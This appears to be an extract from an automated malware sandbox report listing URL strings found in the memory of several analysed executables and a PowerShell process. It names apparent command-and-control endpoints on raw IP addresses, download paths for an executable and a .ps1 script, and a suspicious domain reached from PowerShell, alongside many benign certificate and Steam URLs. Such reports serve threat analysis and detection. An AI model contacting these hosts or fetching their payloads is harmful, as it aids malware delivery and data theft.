Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ctionSettingsamLMEM8
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/en-US
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/icies
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/m
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/q
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/t
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.2065
Source: file.exe, 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206I5i
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206i
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid1J
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?V
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpes0
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu4
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ons
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ows
Source: skotes.exe, 00000017.00000002.3297166595.000000000148B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/file1.exe?8w
Source: skotes.exe, 00000017.00000002.3297166595.000000000148B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/file1.exeJ
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/k4pDgO.ps1
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000019.00000002.2919340127.0000000007074000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi/
Source: file1.exe, 00000018.00000003.2786414749.0000000001324000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797964606.0000000001323000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2853040687.000000000133D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818361545.0000000001323000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813789486.0000000001324000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2784537176.0000000001321000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000019.00000002.2894050768.0000000004571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445071785.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000019.00000002.2894050768.0000000004571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=16
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=16964251364Z
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=16964251364v
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096841796.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095820288.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.oud-cdn.de
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.oud-cdn.de/
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.oud-cdn.de/?ch=user
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.oud-cdn.de/?ch=user%7cpgkoujvbvlam
Source: powershell.exe, 00000019.00000002.2938442239.0000000009A37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cl.oud-cdn.de/?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fa
Source: 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=h6HMV-M6cfAX&a
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&amp
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=englis
